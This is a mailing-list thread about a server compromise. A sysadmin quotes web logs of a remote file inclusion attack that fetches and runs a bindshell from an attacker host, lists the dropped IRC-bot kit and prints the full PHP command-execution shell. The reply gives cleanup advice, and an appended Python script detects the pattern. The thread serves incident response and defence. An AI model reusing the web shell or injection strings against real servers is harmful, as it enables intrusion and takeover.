
Re: Hack attempt



Hi,
Well dear Norbert, it is not some kind of attack .. it is simply a script kiddie that managed to get that inject.txt (actually a PHP script) on your server, and then simply began executing commands on your server after getting a bindshell, from the name probably on port 8080.
Now, as the dude got an eggdrop on there, he's probably some script kiddie who uses your server for IRC stuff (can be anything), waiting for his '31337' master to tell him to DoS someone, which is also possible.
Now there is not much to worry about if you have not had more messages from tripwire telling you there are some binaries that have been changed; I guess that dude is too lame to even get root, change binaries with backdoored ones, and then change the tripwire checksum database.


Anyways .. just remove those files, try to find how he managed to get his PHP script on there, also try to look who has a weak passwd and tell him/her to change it!
Or even better .. just place all kinds of monitoring tools and look if he comes back, and try to see how bad it exactly is. In the meanwhile, I would start building a new server that is safer, then migrate the client stuff from the compromised machine to the new server, and then audit the compromised machine.


cheers, Amine

Norbert Crettol wrote:

Hi all.

This is my first post here. I'm Norbert Crettol, one of the sysadmins
of Idiap, a research center in Switzerland (www.idiap.ch).

We've had an undesired visitor last night, that I discovered in the reports of tripwire.

Here are the logs we got (we get a remote copy of the web server logs
in another host). From the second line on, I've stripped the head and the tail of each line, which is always the same.
--- begin ---
"GET /<some script>.php?bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=id HTTP/1.0" 200 6625 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=uname%20-a
bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=wget
bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=/sbin/ifconfig%20-a
bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/;ls%20-la
bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/lock/;ls%20-la
bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/lock/;wget%20bosscalvin.com/bind2080
bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/lock/;chmod%20755%20bind2080
bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/lock/;./bind2080
--- end ---
I've seen no other


It looks like bind8080 has created a directory /var/lock/.tmp and expanded an archive (owned by the web server owner) there. Here
is the list of the files:
3225 jui 20 03:53 c-leet
15 jui 20 03:47 c-leet.dir
51 jui 20 03:47 cron.d
512 mai 12 2002 doc/
14 jui 21 16:27 eggdrop -> eggdrop-1.6.10*
2523568 mai 12 2002 eggdrop-1.6.10*
512 mai 12 2002 filesys/
343 fév 11 03:55 fuck*
512 mai 12 2002 help/
21149 nov 4 2003 kik*
1024 jui 21 11:00 language/
512 mai 12 2002 logs/
6 jui 20 03:48 pid.CaEm-
23065 jan 29 15:00 proc*
6 jui 20 03:48 psybnc.pid
28591 mai 12 2002 README
89 jui 20 03:53 run*
588 avr 1 10:00 run-*
708 avr 1 10:00 run--*
512 mar 31 08:12 scripts/
512 mai 12 2002 text/
2523568 mar 28 01:41 vi*
30293 nov 17 2002 xhide*
182 jui 20 03:47 y2kupdate*


Here is the content of http://www.bosscalvin.com/inject.txt :
--- begin ---
<font color="red">
<br><font face="Comic Sans MS" size="2"><center>
<b>CMD</b> - System Command<br><br></center></font><font face="Verdana" size="1"></center><br>
<b>#</b> CMD PHP : <br>
<b>#</b> Released by : <b>SecurityCorp</b><br>
<b>#</b> Edited by CaEm
<br>
<br>
<hr color="red" width=751px height=115px>
<br>
<pre><font face="Verdana" size="1">
<?
 // CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
 if (isset($chdir)) @chdir($chdir);
 ob_start();
 system("$cmd 1> /tmp/nobody 2>&1; cat /tmp/nobody; rm -rf /tmp/nobody");
 $output = ob_get_contents();
 ob_end_clean();
 if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));
?>
</font></pre>
<br>
<hr color="red" width=751px height=115px>
<br>
<font face="Comic Sans MS" size="1"><b>« CaEm » </b><br><b>@ </b><b> îrç.Ðå£.ñët <i>#Renjana</i></b><br>
--- end ---

Has someone seen this kind of attack? (chkrootkit doesn't detect it).
Has someone heard of this www.bosscalvin.com (or www.calvinmumu.org)?
Is there a way to stop this guy? His nickname (CaEm) appears in the uploaded scripts.


Norbert
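A small detector for the request pattern shown in the logs above, added here as an example and not part of the original thread. It parses combined-format entries and, as the poster stripped most lines down to their query strings, also accepts bare query strings; any parameter whose value is a URL is reported as a suspected remote file inclusion together with the decoded cmd parameter. The sample lines are constructed from the post, with one benign request added as a control.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample: line 1 is the full entry quoted in the post, lines 2-3 are
# query strings as the poster stripped them, line 4 is a benign control.
SAMPLE_LINES = [
    '"GET /<some script>.php?bodyfile=http://www.bosscalvin.com/inject.txt?'
    '&cmd=id HTTP/1.0" 200 6625 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"',
    'bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/lock/;wget%20bosscalvin.com/bind2080',
    'bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/lock/;./bind2080',
    '"GET /index.php?page=about HTTP/1.0" 200 512 "-" "Mozilla/5.0"',
]

# Request line of a combined-format entry; non-greedy so the placeholder path
# with a space in the post still parses.
REQUEST_RE = re.compile(r'"(GET|POST|HEAD) (.*?) HTTP/\d\.\d"')
# A parameter value pointing at a remote resource is the RFI marker.
REMOTE_SCHEME = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)


def parse_query(query):
    """Split on '&' only and percent-decode. Done by hand because older
    urllib.parse.parse_qs also splits on ';', which would cut the commands."""
    params = {}
    for pair in query.split('&'):
        if not pair:
            continue
        name, _, value = pair.partition('=')
        params.setdefault(unquote_plus(name), []).append(unquote_plus(value))
    return params


def find_rfi(line):
    """Return a finding for a suspected remote file inclusion, else None."""
    match = REQUEST_RE.search(line)
    if match:
        path, _, query = match.group(2).partition('?')
    else:
        # No request framing: treat the whole line as a bare query string.
        path, query = None, line.strip()
    params = parse_query(query)
    remote = {name: value for name, values in params.items()
              for value in values if REMOTE_SCHEME.match(value)}
    if not remote:
        return None
    return {'path': path, 'include': remote, 'cmd': params.get('cmd', [None])[0]}


def scan(lines):
    """Collect the non-empty findings over a sequence of log lines."""
    return [f for f in map(find_rfi, lines) if f]
```

Run `scan(SAMPLE_LINES)` to get three findings, each naming the included URL and the command it carried; the benign line yields nothing.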